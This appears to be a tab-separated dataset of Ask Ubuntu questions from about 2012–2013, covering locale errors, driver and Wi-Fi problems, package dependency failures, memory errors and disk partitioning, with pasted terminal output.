253381	how to get past `` can not change locale '' error in ubuntu server ?	my server is hosted by a french provider , which by default set locales to french ( quite obviously ) when a new system is installed . from thereâś just no way to cleanly change it without getting the following error : bash : warning : setlocale : lc_all : can not change locale ( en_us : utf-8 ) i 've been googling for a week and tried many ways to set it cleanly ; but it remains ill . i would be very happy to know if there was a clean , efficient way to set it ( as far as i 've read , this change remains odd and no working answer has been found ) .
253382	unable to reinstall ubuntu on acer one netbook ( ca n't change boot sequence )	i 'm new to ubuntu and linux . i installed 12.04.1 onto my acer one netbook replacing windows as my os . after doing this i realised that i made a mistake in the partitioning and would like to reinstall ubuntu as i ca n't make the changes i want to otherwise . the problem is that the acer one bios is very basic and does n't give the option of booting from cd . i have tried to reinstall by selecting wubi.exe on the cd , but get the following error : archive : /media/ubuntu 12.04.1 lts i386/wubi.exe [ /media/ubuntu 12.04.1 lts i386/wubi.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /media/ubuntu 12.04.1 lts i386/wubi.exe or /media/ubuntu 12.04.1 lts i386/wubi.exe.zip , and can not find /media/ubuntu 12.04.1 lts i386/wubi.exe.zip , period . any ideas on how to fix this up ?
253384	installing gd and gd module	i am having trouble installing the gd library and gdmodule for python firstly i have done sudo apt-get install mercurial sudo apt-get install libgd2-xpm-dev then trying to install the gd module using sudo python setup.py install which i downloaded from http : //newcenturycomputers.net/projects/gdmodule.html i get the warning warning : missing gd , jpeg , png , gif , z , x11 , xmp , rtf , freetype libraries ca n't find gd libraries how can i install both properly , i get no errors when installing the first two . i am completely stuck and i am very new to using ubuntu , so do not know a lot .
253390	what 's the equivalent of `` rpm -q whatrequires '' ?	wonder that i could not find the deb equivalent of rpm -q whatrequires < installed package > all i can find is either the equivalent of rpm -q requires or the whatrequires for a yet to be installed deb package . if this is already answered please accept my appologies and point me to the right place .
253395	touchscreen calibration with dual monitors ( nvidia and xinput )	i 've got a nvidia gtx260 card with one regular screen above one touchscreen using the egalax driver . i 've tried to configure the touchscreen using xinput but i ca n't get it right . with the normal screen disconnected and fiddling with the `` evdev axis calibration '' option it works fine , but when i hook up the normal screen again the tough mapping is shifted . if i touch the touchscreen the mouse moves to the corresponding position on the other screen . neither `` coordinate transformation matrix '' nor `` map-to-output '' seems to work ... any help is greatly appreciated ! /henrik
253399	bluetooth connection - will not auto pair/reconnect to audio device	i am using bluetooth 4.99 & bluez . my audio device is paired successfully . however , on the second attempt to connect there is no auto pairing . i have to issue : bluez-test-audio connect < address > each and every time to reconnect . all values for adapter annd device are correct in /var/lib/bluetooth . spent hours/days on this ! help please ! added : root @ debian : ~ # dir /var/lib/bluetooth/00:1b:10:00:05:94 classes did features lastused manufacturers profiles trusts config eir lastseen linkkeys names sdp edit : i enabled autoconnect in audio.conf - makes no difference ... or should i delete the whole bluetooth settings , and restart the pairing again ? i 'd really appreciate some help on this .
253402	ubuntu is using ycbcr output not rgb over hdmi	i am having a problem with my display . from a cold start everything appears normal up until the “ubuntu” appears on the splash screen . then the color turns to a psychedelic “washed out” green . i can manually fix the problem by forcing my monitor to use rgb input color format , however , it involves using the monitors own settings interface . the display always changes back when the shutdown splash screen appears . it appears to me that ubuntu is outputting a ycbcr signal through the hdmi . in windows 7 i can see that there is an option for the intel graphics to output in ycbcr – intel control panel – display – color enhancement . i can not find any way of changing these settings in ubuntu and any help would be appreciated . ubuntu 12.10 installed on its own disk and updated as recommended . intel i5 2500k with hd3000 graphics ( standard settings – no overclocks ) connected via hdmi to a dell sp2309w monitor ( z68 chipset with 8gb )
253410	dual screen resolotion not working	i have a wide 1920*1080 screen and 1680*1050 screen . by them self , they work properly . but with dual screen only the wide screen work 's properly and the other cut 's the edges . it seems no resolotion fit 's the 1680*1050 screen in dual screen . any ways of fixing this ?
253414	after upgrading from 12.04.to 12.10 will i have to install my drivers again ?	i want to upgrade from 12.04 to 12.10 but will i have to install the broadcom drivers and some softwares that i installed from backtrack repository ? ?
253416	appindicator vala library	i want to make an tasks indicator app for google apps in vala . but i ca n't seem to find the appindicator library i need to make this . i 'm relatively new to vala but i ca n't find the vapi file , so i ca n't compile my programs ... here is an example of a vala appindicator http : //developer.ubuntu.com/resources/technologies/application-indicators/
253418	install of linux-headers-3.2.0-38-generic_3.2.0-38.59_amd64 failed at update	an error occurred during a regular update of my ubuntu 12.04 installation the message box suggested to try apt-get install -f in a terminal window : ... .. entpacken von linux-headers-3.2.0-38-generic ( aus ... /linux-headers-3.2.0-38-generic_3.2.0-38.59_amd64.deb ) ... dpkg : fehler beim bearbeiten von /var/cache/apt/archives/linux-headers-3.2.0-38-generic_3.2.0-38.59_amd64.deb ( -- unpack ) : »/usr/src/linux-headers-3.2.0-38-generic/include/config/mtrr/sanitizer/spare/reg/nr/default.h.dpkg-new« konnte nicht angelegt werden ( während der verarbeitung von »./usr/src/linux-headers-3.2.0-38-generic/include/config/mtrr/sanitizer/spare/reg/nr/default.h« ) : auf dem gerät ist kein speicherplatz mehr verfügbar es wurde kein apport-bericht verfasst , da das limit maxreports bereits erreicht ist dpkg-deb : fehler : unterprozess einfügen wurde durch signal ( datenübergabe unterbrochen ( broken pipe ) ) getötet fehler traten auf beim bearbeiten von : /var/cache/apt/archives/linux-headers-3.2.0-38-generic_3.2.0-38.59_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the error message says that there is not enough space to unpack the header file but there seems to be enough space at all filesystems : dateisystem größe benutzt verf . verw % eingehängt auf /dev/sda1 7,9g 6,7g 832m 90 % / udev 1,8g 4,0k 1,8g 1 % /dev tmpfs 715m 1,1m 714m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 1,8g 160k 1,8g 1 % /run/shm /dev/mapper/raid-temporary 92g 188m 87g 1 % /tmp /dev/md0 92m 70m 17m 81 % /media/raid/boot /dev/mapper/raid-home 99g 57g 38g 61 % /media/raid/home /dev/mapper/raid-rdata 3,9t 3,6t 88g 98 % /media/raid/rdata /dev/mapper/raid-system 7,4g 5,3g 1,7g 77 % /media/raid/saneba /dev/sda5 210g 68g 132g 34 % /home /home/franz/.private 210g 68g 132g 34 % /home/franz what can i do ?
253421	ubuntu 12.04 and wifi access problem	i 'm having some issue with internet access . i 've got a samsung laptop with a broadcom wireless card and ubuntu 12.04 on it . everything worked fine at the beginning , but recently , probably after some kernel update , i noticed that i do n't receive any packets for few seconds . when i tried to look what 's wrong i noticed i ca n't access to router ( some cheap tp link ) , even ping is failing . router is ok , because i am able to access it from other devices , and even from my laptop from windows . but this disconnecting is very annoying . anyone has the same issue ? where can be the problem ? 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) subsystem : wistron neweb corp. device 051a flags : bus master , fast devsel , latency 0 , irq 16 memory at fc500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] vendor specific information : len=78 < ? > capabilities : [ 48 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ d0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 13c ] virtual channel capabilities : [ 160 ] device serial number 00-00-b1-ff-ff-ef-00-1b capabilities : [ 16c ] power budgeting < ? > kernel driver in use : wl kernel modules : wl , bcma , brcmsmac
253423	login not poosible because no password prompt	i have a somewhat odd problem . i 'm using ubuntu 10.04 and yesterday i installed and configured ldap for centralized login . i created a new user `` test '' in the ldap directory . i wanted to login with that user to see if it works but i could not . there was no password prompt . what is even worse is that there is no password prompt for me as a user local to that machine ( not defined in ldap ) . so i 'm locked out of that box . what can i do to be able to log in again ? regards , michael
253426	update only one non-ppa repository	i have just added the mate desktop repository with this command : sudo add-apt-repository `` deb http : //packages.mate-desktop.org/repo/ubuntu quantal main '' i have quite a few repositories installed , and running sudo apt-get update can take quite some time . i have heard of ways to update a specific ppa , however , the solutions do n't work with a repository added through it 's deb repository line . is there any way that i can choose to update only one non-ppa repository ?
253431	in 12.04 over heating , can anyone help me ?	i am using ubuntu 12.04 32bit os . when i write on iibreoffice or open two or three tabs in mozilla firefox or open more than one programs or open software download center taking my notebook over heating and shutdown . in system > details > overview > graphics : unknown system > details > graphics > driver : unknown so , how can i avoid over heating and identify my graphics driver and then use my lovely ubuntu comfortably ? i 've searched more then 25+ questions about overheating , but did n't found an answer to solve my problem . notebook model : hp compaq cq43-400tu , dual core . in this picture my notebook configuration : important to know that , in windows 7 , i have operated my notebook by opening many programs , many tabs in mozilla , not was any problem . ( please , forgive me for my poor english ! )
253432	after update ubuntu 12.04 , 3d has disabled	i updated ubuntu 12.04 yesterday ( 09/01/2013 ) . after the update ( updated the kernel , and several other things that i noticed ) , it 's requested a system reboot . rebooted : unity 3d is loaded ( only the vertical bar ) , the `` unity background is purple '' and nothing else is loaded icons , top bar , etc . ( ctrl+alt+f1 does n't work , it 's completed freeze ) . only works the unity 2d or xfce . edit : ➜ ~ sudo glxspheres polygons in scene : 62464 visual id of window : 0xa6 context is direct opengl renderer : mesa dri intel ( r ) sandybridge mobile 60.171477 frames/sec - 67.151368 mpixels/sec 60.013886 frames/sec - 66.975496 mpixels/sec 59.871287 frames/sec - 66.816357 mpixels/sec ➜ ~ sudo optirun glxspheres polygons in scene : 62464 visual id of window : 0x21 context is direct opengl renderer : geforce gt 540m/pcie/sse2 94.500831 frames/sec - 105.462928 mpixels/sec 96.664706 frames/sec - 107.877811 mpixels/sec 96.986230 frames/sec - 108.236633 mpixels/sec 107.303790 frames/sec - 119.751029 mpixels/sec ➜ ~ os : ubuntu 12.04 x64 notebook : dell xps l502x graphic card : nvidia gt540m 2gb sorry about my english .
253433	install code : :blocks in ubuntu 12.10	i installed code : :blocks from muon software center ( i 'm using kde ) and i got code : :blocks 10.05 . i found this link : https : //launchpad.net/~pasgui/+archive/ppa/ after adding this ppa , and running sudo apt-get update if i run sudo apt-get install codeblocks , which version of code : :blocks will i get ? if i download the tarball from the main site , how to i install it properly ? can someone help me out ?
253436	disk partition windows installer	i 'm asking because i downloaded the windows installer version , when i open the installer , a window with everything is open and at the bottom say `` install '' but at middle sais `` size instalation '' and the max is 30gb , that will be my ubuntu part in my pc ? or after reboot it will say `` selec your partition size '' ? what do you recommend me ? its my first time , so its better if i download common installer and try with a cd ? thank you
253445	unable to try/install ubuntu 12.10 from liveusb	i 've got a computer that shipped with windows 8 , installed in efi . i want to install ubuntu in dual boot , so i have to install it in efi as well . i disabled the 'secure boot ' in the bios . i created a live usb using the 64bits version . i can boot from it , and get to the screen with the 3 different options : try / install / check for errors . i 'm using nomodeset because of some graphical issue . when i check for errors , no errors are detected . i also checked the hashes on the iso file to make sure it was n't corrupted - no problem there . so when i use the option try ubuntu , it starts fine but always stops at the same point . here are the last few lines i 've got on screen : * starting configure network device security [ ok ] * starting cups printing spooler/server [ ok ] * starting cpu interrupts balancing daemon [ ok ] * stopping save kernel messages [ ok ] * starting crash report submission daemon [ ok ] * stopping anac ( h ) ronistic cron [ ok ] and that 's it , nothing happens after that . any help/advice you can provide will be most welcome ! update : solved i found a solution to my problem here : after upgrading to 12.04 i ca n't get to the login screen i booted from grub using the option 'xforcevesa ' , that did the trick !
253446	ubuntu 12.10 : wireless not working after update	i am using an alienware m11xr2 with i5 processor . my wifi stopped working after update . its broadcom bcm43224 . pci id is [ 14e4:4353 ] . i do n't have a wired network connection to use nor do i have a cd of ubuntu 12.10 . please provide links for packages . also instructions to install it from home directory . i have tried myself for the past week looking at other questions but the process in other questions goes to the internet . also i am too tired to search more . i m currently using internet through windows and so can access this page only via this . please help..
253448	how to install and keep updated most recent versions of blender in ubuntu	blender is a perfect piece of software with many brillian changes in each minor release . but often most recent versions of ubuntu does not have latest versions of blender .
253451	lubuntu window geometry - force window to always open in the same location ?	i 'd like my chromium window to open with the same size and in the same place every time . i thought i 'd be able to make this happen by editing lubuntu-rc.xml like this : chromium-browser -- geometry=140x40+0+0 but it does n't seem to make any difference . chromium does remember the last size , but never the last location .
253453	laptop battery life decreased compared to windows 7	i 'm new to linux and few days ago i installed it on my laptop . i have windows 7 64-bit in one partition and on other partitions the ubuntu 12.10 ( 6gb ) , swap partition ( 8gb ) and /home partition about 60gb . the battery life on windows have about 3 hr life but on ubuntu only 1hr and 20 min . what might be problem ? as i say before i new to linux and it 's my 1-st time i 'm using it . also in the system on ubuntu it says that the graphic is unknown , but when i 'm checking it through package that i installed it recognize my graphic card . maybe there is a problem with the drivers of the card ? i 'm using dell vostro 3450 , i have 2 graphic cards amd radeon hd 6630m and intel graphic card on the mother board . from what i read on the forums it might be a problem with the drivers when there are 2 graphic cards . i have 3 questions , the first is about the battery life , the second one is about the graphic cards drivers and the third about the size of the partitions ( i set those size 's from what i read on the forums ) . thanks a lot for the help .
253460	error broken count > 0	i am running ubuntu 11.10 . i have this error message that shows as a no-entry sign such as http : //www.clker.com/clipart-no-entry-sign.html & h=300 & w=294 & sz=58 & tbnid=c0zjrlbghmq5im % 3a & tbnh=90 & tbnw=88 & zoom=1 & usg=__c3ehezlxg0jho9j44rnejkgwntk= & docid=2we-pkrvsljwzm & sa=x & ei=g7yxua2ok4ro2gxpmyhydw & ved=0cd4q9qewaw & dur=657 '' > this . i read the following questions on the forum : broken package after update : linux-headers , error brokencount > 0 dependencies not met on 12.04 ? duplicate broken package after update : linux-headers , error broken count > 0 however , these point to my drive being full . i ran df -i and got the following output : df -i filesystem inodes iused ifree iuse % mounted on /dev/sda1 30048256 985142 29063114 4 % / udev 1010270 511 1009759 1 % /dev tmpfs 1012523 445 1012078 1 % /run none 1012523 1 1012522 1 % /run/lock none 1012523 8 1012515 1 % /run/shm the error message also suggests that i run sudo apt-get install -f. i do n't know what that does and when i run it , it warns me that it is going to remve about 2 gb worth of stuff ! sudo apt-get install -f [ sudo ] password for dnaneet : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libgdl-3-common libaccess-bridge-java python-logilab-astng freetennis-common libntfs10 pylint sensible-mda cdparanoia libanjuta-3-0 python-sphinx python-mako python-pywapi texlive python-pygments libqtscript4-network id3v2 python-reportlab libqtscript4-gui mercurial pyflakes libboost-signals1.46.1 assaultcube-data texlive-fonts-recommended python-uniconvertor libtag-extras1 libqtscript4-sql python-renderpm libgtkpod1 libid3-3.8.3c2a k3b-data libqtscript4-xml procmail libqjson0 python-dnspython libjs-underscore libaccess-bridge-java-jni tipa libcluttergesture-0.0.2-0 indicator-status-provider-emesene amarok-utils python-svn python-docutils libclutter-imcontext-0.1-0 python-rope cheese-common amarok-common texlive-fonts-recommended-doc anjuta-common wine1.2-gecko libmx-1.0-2 vorbis-tools python-logilab-common python-markupsafe libgtksourceview2.0-0 gtkpod-data libenet1a libqtscript4-uitools liblastfm0 libgsl0ldbl python-roman libloudmouth1-0 python-jinja2 libqtscript4-core python-xmpp libclutter-gtk-1.0-0 libgdl-3-1 libjs-sphinxdoc python-reportlab-accel libgtksourceview2.0-common mercurial-common use 'apt-get autoremove ' to remove them . the following packages will be removed : 0ad 0ad-data 0ad-data-common amarok apturl banshee banshee-extension-soundmenu banshee-extension-ubuntuonemusicstore bluez-gstreamer brasero brasero-cdrkit cb2bib cheese dconf-tools emesene empathy evolution-data-server gimp ginn gir1.2-rb-3.0 gir1.2-totem-1.0 gir1.2-webkit-3.0 gloobus-preview gnome-codec-install gnome-control-center gnome-media gnome-online-accounts gnome-power-manager gnome-session-fallback gnome-shell gnome-tweak-tool gnome-user-guide gnome-video-effects gnuplot gnuplot-x11 gstreamer0.10-alsa gstreamer0.10-ffmpeg gstreamer0.10-fluendo-mp3 gstreamer0.10-gconf gstreamer0.10-nice gstreamer0.10-plugins-bad gstreamer0.10-plugins-bad-multiverse gstreamer0.10-plugins-base gstreamer0.10-plugins-base-apps gstreamer0.10-plugins-good gstreamer0.10-plugins-ugly gstreamer0.10-pulseaudio gstreamer0.10-tools gstreamer0.10-x gtkpod gwibber indicator-datetime indicator-power inkscape k3b kde-runtime kdebase-runtime kdelibs5-plugins kdemultimedia-kio-plugins kile kile-l10n konsole kubuntu-debug-installer libbrasero-media3-1 libcanberra-gtk3-module libcheese-gtk20 libcheese1 libclutter-gst-1.0-0 libdmapsharing-3.0-2 libgnome-media-profiles-3.0-0 libgoa-1.0-0 libgstfarsight0.10-0 libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 libk3b6 libk3b6-extracodecs libkcddb4 libkdewebkit5 libokularcore1 libplasma3 libpurple0 libqtwebkit-dev libqtwebkit4 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-emailmerge libreoffice-gnome libreoffice-gtk libreoffice-help-de libreoffice-help-en-gb libreoffice-help-en-us libreoffice-help-fr libreoffice-impress libreoffice-l10n-de libreoffice-l10n-en-gb libreoffice-l10n-en-za libreoffice-l10n-fr libreoffice-math libreoffice-style-human libreoffice-writer librhythmbox-core4 libslv2-9 libsyncdaemon-1.0-1 libtelepathy-farsight0 libtotem0 libubuntuone-1.0-1 libubuntuone1.0-cil libwebkitgtk-1.0-0 libwebkitgtk-3.0-0 libwxgtk2.8-0 libyelp0 metacity mythes-de mythes-de-ch mythes-en-au mythes-en-us mythes-fr nautilus-sendto-empathy nautilus-share netflix-desktop notify-osd okular oneconf openoffice.org-common phonon phonon-backend-gstreamer plasma-scriptengine-javascript playonlinux python-farsight python-gst0.10 python-lxml python-papyon python-qt4 python-spyderlib python-ubuntuone-client python-ubuntuone-control-panel python-uno python-webkit python-wxgtk2.8 python-wxversion qapt-batch rhythmbox rhythmbox-plugin-cdrecorder rhythmbox-plugins screenlets screenlets-pack-all sessioninstaller shotwell software-center spyder steam : i386 telepathy-butterfly telepathy-haze totem totem-mozilla totem-plugins ubuntu-docs ubuntu-sso-client ubuntuone-client ubuntuone-client-gnome ubuntuone-control-panel ubuntuone-control-panel-gtk ubuntuone-couch unity-2d update-notifier wine-browser-installer xul-ext-ubufox yelp zenity 0 upgraded , 0 newly installed , 172 to remove and 11 not upgraded . 10 not fully installed or removed . after this operation , 2,001 mb disk space will be freed . do you want to continue [ y/n ] ? so what should i do about this ? edit : list of recent packages installed 2013-02-05 07:47:12 status installed man-db 2.6.0.2-2 2013-02-05 07:47:13 status installed bamfdaemon 0.2.104-0ubuntu1.1 2013-02-05 07:47:14 status installed desktop-file-utils 0.18-0ubuntu9 2013-02-05 07:47:14 status installed gnome-menus 3.2.0-0ubuntu2 2013-02-05 07:47:25 status installed hicolor-icon-theme 0.12-1ubuntu1 2013-02-05 07:47:26 status installed menu 2.1.45ubuntu1 2013-02-05 07:47:28 status installed initramfs-tools 0.99ubuntu8 2013-02-05 07:51:28 status installed google-chrome-stable 24.0.1312.68-r180326 2013-02-05 07:51:28 status installed ubuntu-docs 11.10.6 2013-02-05 07:51:28 status installed inkscape 0.48.2-0ubuntu1.1 2013-02-05 07:51:29 status installed libavutil-extra-51 4:0.7.6ubuntu0.11.10.3+medibuntu1 2013-02-05 07:51:29 status installed libavcodec-extra-53 4:0.7.6ubuntu0.11.10.3+medibuntu1 2013-02-05 07:51:29 status installed whois 5.0.11ubuntu3 2013-02-05 07:51:30 status installed mendeleydesktop 1.8-stable 2013-02-05 07:51:30 status installed chromium-codecs-ffmpeg 24.0.1312.56-0ubuntu0.11.10.1 2013-02-05 07:51:30 status installed chromium-browser 24.0.1312.56-0ubuntu0.11.10.1 2013-02-05 07:51:31 status installed chromium-browser-l10n 24.0.1312.56-0ubuntu0.11.10.1 2013-02-05 07:51:41 status installed menu 2.1.45ubuntu1 2013-02-05 07:51:42 status installed libc-bin 2.13-20ubuntu5.3 2013-02-05 07:51:42 status installed initramfs-tools 0.99ubuntu8 2013-02-09 12:46:24 startup archives install 2013-02-09 12:50:39 startup archives install 2013-02-09 12:50:47 install steam : i386 < none > 1.0.0.25 2013-02-09 12:50:49 status installed bamfdaemon 0.2.104-0ubuntu1.1 2013-02-09 12:50:50 status installed desktop-file-utils 0.18-0ubuntu9 2013-02-09 12:50:50 status installed gnome-menus 3.2.0-0ubuntu2 2013-02-09 12:51:04 status installed hicolor-icon-theme 0.12-1ubuntu1 2013-02-09 12:51:05 status installed man-db 2.6.0.2-2 output from sudo apt-get install reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : steam : i386 : depends : xterm : i386 but it is not installed or gnome-terminal : i386 but it is not installed depends : zenity : i386 but it is not installed e : unmet dependencies . try using -f
253462	size of / partition ?	so , i decided i really need a seperate /home , since i never upgrade ubuntu and always do a clean install etc , and i 'm getting to a point where my data is becoming way too large for simple backups . right now i have ubuntu 12.10 installed and i 'm going to create a partition inside there and then probably just copy the current home to the new and set mount point . the thing is though , i 'm having to do a big spring clean since i have 100gig left of a 500gig hdd , but have absolutely no idea how much of that is taken up by / and how much would be taken up by my /home . so my question is this . i want to ensure that i make my new /home big enough to house all my data , but have plenty of room for root files if i install new apps etc . so , my question i guess is , how much room should i leave for / to ensure i wo n't have to worry at all about installing new apps ?
253463	can not install adobe reader on 12.10 unity	i 'm unable to install adobe reader on my ubuntu 12.10 unity . i followed the directions here from www.noobslab.com the first two commands did not throw any errors , but the last one went like this : zach @ zach-lemur-ultra : ~ $ sudo apt-get install acroread reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : acroread : depends : ia32-libs ( > = 20080808 ) but it is not going to be installed depends : lib32gcc1 ( > = 1:4.1.1 ) but it is not going to be installed depends : lib32stdc++6 ( > = 4.1.1 ) but it is not going to be installed depends : lib32z1 ( > = 1:1.1.4 ) but it is not going to be installed depends : libc6-i386 ( > = 2.3.2 ) but it is not going to be installed depends : nspluginwrapper but it is not going to be installed depends : acroread-common but it is not going to be installed conflicts : adobereader-enu : i386 adobereader-enu : i386 : depends : libgtk2.0-0 : i386 ( > = 2.4 ) but it is not going to be > installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a > solution ) . if i try to install the dependencies by following the directions and running commands like sudo apt-get -f install ia32-libs i just get more list of other dependencies that need to be installed , with no end . is there an easy way ? .
253466	why am i frequently getting this `` can not allocate memory '' error ?	i 'm using ubuntu 12.10 with gnome-classic . i am getting this error frequently and with almost all programs , big and small . when i try to open them , they do n't start , and instead i get an error message that says could not launch 'program ' - failed to fork child process ( can not allocate memory ) . this was n't a problem until within the last few weeks . i can not discern any commonality among the programs that cause this error . it seems to be more a matter of time . after my computer has been running for a while , anywhere from a day to a few days , then i ca n't seem to start any new programs . the only way i know to prevent this error is to reboot the computer . why am i getting this error and what do i do to stop it happening ? i ran the memtest available from the grub menu , and it reports no errors , so i do n't think this is a hardware failure . i also ran sudo apt-get check , and no errors were found . here is some requested command line output : $ free -m total used free shared buffers cached mem : 3945 3753 191 0 181 475 -/+ buffers/cache : 3096 848 swap : 3813 60 3753 $ swapon -s filename type size used priority /dev/sda6 partition 3905532 61648 -1 $ ulimit -a core file size ( blocks , -c ) 0 data seg size ( kbytes , -d ) unlimited scheduling priority ( -e ) 0 file size ( blocks , -f ) unlimited pending signals ( -i ) 31421 max locked memory ( kbytes , -l ) 64 max memory size ( kbytes , -m ) unlimited open files ( -n ) 1024 pipe size ( 512 bytes , -p ) 8 posix message queues ( bytes , -q ) 819200 real-time priority ( -r ) 0 stack size ( kbytes , -s ) 8192 cpu time ( seconds , -t ) unlimited max user processes ( -u ) 31421 virtual memory ( kbytes , -v ) unlimited file locks ( -x ) unlimited this is the output of ps -- sort -rss -eo rss , pid , command | head after the error starts showing up : $ ps -- sort -rss -eo rss , pid , command | head rss pid command 1963400 2953 gnome-panel 155496 4029 banshee /usr/lib/banshee/banshee.exe -- redirect-log -- play-enqueued 104944 15765 /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=forcecompositingmode/disable/globalsdch/global_enable_sdch/infinitecache/no/omniboxdisallowinlinehqp/standard/omniboxhupcreateshortermatch/standard/omniboxhupcullredirects/standard/omniboxsearchsuggesttrialstarted2012q4/2/oneclicksignin/standard/prerender/prerenderenabled/sbinterstitial/v2/spdycwnd/cwndmin10/speculativeprefetching/disabled/test0percentdefault/group_01/uma-dynamic-binary-uniformity-trial/default/uma-session-randomized-uniformity-trial-5-percent/default/uma-uniformity-trial-1-percent/group_09/uma-uniformity-trial-10-percent/group_08/uma-uniformity-trial-20-percent/group_03/uma-uniformity-trial-5-percent/group_06/uma-uniformity-trial-50-percent/group_01/warmsocketimpact/last_accessed_socket/ -- enable-crash-reporter=ece9000094d279fd3b14b35a74bf72cc , ubuntu 12.10 -- renderer-print-preview -- disable-accelerated-2d-canvas -- disable-accelerated-video-decode -- channel=15654.5.89177240 78164 15654 /opt/google/chrome/chrome 74912 19890 /usr/bin/python /usr/share/oneconf/oneconf-service 65476 12419 /usr/bin/perl /usr/bin/shutter 61096 19626 /usr/bin/python3.2 /usr/sbin/aptd 57832 15708 /opt/google/chrome/chrome -- type=renderer -- lang=en-us -- force-fieldtrials=forcecompositingmode/disable/globalsdch/global_enable_sdch/infinitecache/no/omniboxdisallowinlinehqp/standard/omniboxhupcreateshortermatch/standard/omniboxhupcullredirects/standard/omniboxsearchsuggesttrialstarted2012q4/2/oneclicksignin/standard/prerender/prerenderenabled/sbinterstitial/v2/spdycwnd/cwndmin10/speculativeprefetching/disabled/test0percentdefault/group_01/uma-dynamic-binary-uniformity-trial/default/uma-session-randomized-uniformity-trial-5-percent/default/uma-uniformity-trial-1-percent/group_09/uma-uniformity-trial-10-percent/group_08/uma-uniformity-trial-20-percent/group_03/uma-uniformity-trial-5-percent/group_06/uma-uniformity-trial-50-percent/group_01/warmsocketimpact/last_accessed_socket/ -- enable-crash-reporter=ece9000094d279fd3b14b35a74bf72cc , ubuntu 12.10 -- extension-process -- renderer-print-preview -- disable-accelerated-2d-canvas -- disable-accelerated-video-decode -- channel=15654.2.1555888673 42108 3030 /var/lib/dropbox/.dropbox-dist/dropbox based on suggestions in the comments and answers , it seems possible the problem is with the gnome panel or its applets . here are the applets i have running : the applets are indicator applet session 12.10.1 , indicator applet 12.10.1 , system monitor 3.5.92 , and a `` notification area '' . and `` date and time '' , neither of which i can access the version number for . here is some more requested command line output : $ df -h filesystem size used avail use % mounted on /dev/sda5 19g 12g 6.4g 64 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 790m 1.1m 789m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 84k 2.0g 1 % /run/shm none 100m 0 100m 0 % /run/user /dev/sda7 384g 306g 59g 84 % /home mythbuntu @ 192.168.0.4 : /home/mythbuntu 437g 360g 55g 87 % /home/dave/mythbuntu $ sudo du -csh /var/log 15m /var/log 15m total
253469	installation -- no internet connection option	i installed ubuntu 12.10 on my laptop . i tried to right click on the right hand corner where the internet icon is , and it says wired network disconnected . below that , i see that enable networking has a check mark next to it . i clicked on edit connections , and the name of the wireless connection that i want is listed under the wireless tab , but i do n't know what to do . i have no idea what to do . am i missing a driver ? is there something that i 'm missing ? can someone please help me ?
253470	wi-fi interferes with other devices when connected ?	ok , this is kinda weirdo and not easy to explain . after the latest updates , i 've noticed that my smartphone and other devices ca n't connect to the internet when my ubuntu is running and connected via wi-fi . after lots of testing ( including changing my router ) i discovered it 's `` ubuntu 's fault '' : other devices have access to the internet only when wi-fi is off and when my laptop runs on my windows 7 partition . also , other devices can connect if w7 is connected via wifi . obviously , when i try to connect a device being far from my laptop , the problem disappears ... this problem started about 10 days ago and i still have n't found a solution . i 've also did a fresh installation 3 days ago , hoping to resolve . my idea is that it may be an issue with the latest kernels . any help is more than well accepted : ) ps : sorry for my english , i 'm an italian guy
253473	how to install ubuntu server 12.10 on proliant microserver ?	i am trying to install ubuntu server 12.10 on my proliant microserver n40l but i am having problems . i want to install it on the 5th drive , connected to the 5th sata port . everything seems fine until i reboot to start the os ... which does n't happen . the hard drive is seen as /dev/sde , sda to sdd are the data drives and i do not want to touch them . i am not sure if the problem is due to grub or if i am choosing the right partitioning mode ( tried lvm , full disk , etc ) any help ?
253476	update textentry of webbrowser in python	i got a basic web browser set up and working with quickly and python code , but how do i set it up so my textentry object ( where the url is entered ) to update if i click on a link on the webpage . it 's sorta strange for it to display http : //www.google.com when i click youtube on the google homepage to go to youtube and the entry not update . can someone please help ?
253477	why can i not set custom resolution for ubuntu 12.04 running in a virtual machine ?	i have installed ubuntu 12.04 on the latest virtualbox release and i can not change the resolution . here are the commands that i run : -- in windows vboxmanage setextradata `` ubuntu '' `` customvideomode1 '' `` 1920x1080x32 '' -- in ubuntu ~ $ gtf 1920 1080 32 # 1920x1080 @ 32.00 hz ( gtf ) hsync : 35.20 khz ; pclk : 86.17 mhz modeline `` 1920x1080_32.00 '' 86.17 1920 1992 2184 2448 1080 1081 1084 1100 -hsync +vsync ~ $ xrandr -- newmode `` 1920x1080_32.00 '' 86.17 1920 1992 2184 2448 1080 1081 1084 1100 -hsync +vsync xrandr : failed to get size of gamma for output default because this fails , xrandr -- addmode does not work either . i kept searching the webs and there 's a common reccurent theme with a file /etc/x11/xconf.org but this is apparently missing from my image . also the scroll does n't work .
253479	failed to create a file system	my dell inspiron 1545 is having no operating system now . while i am trying to install ubuntu 12.10 from usb , i am getting this error `` the ext4file system creation in partition # 1 of scsi1 ( 0,0,0 ) ( sda ) failed '' what should i do to complete my installation successfully .
